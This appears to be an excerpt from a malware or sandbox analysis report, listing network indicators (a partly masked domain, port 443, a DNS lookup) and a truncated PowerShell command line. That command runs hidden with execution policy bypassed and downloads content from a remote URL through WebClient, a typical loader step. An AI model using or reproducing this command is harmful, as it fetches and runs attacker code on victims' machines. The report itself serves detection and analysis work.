Technical Information
- $pfzfnoatyhstgsqasucvindvsmtycaodnzl
- 'bo####hcompany.com':443
- 'bo####hcompany.com':443
- DNS ASK bo####hcompany.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex Bypass -NoP -C $PFZfNOATyHSTgsQasuCVindvSmtycaoDNzL='https://boxtechcompany.com/data.php?5398';$fTdfHENWClCnLcJktkceFr=(New-Object System.Net.WebClient).DownloadString($PFZfNOATyHSTgsQasuCV...' (with hidden window)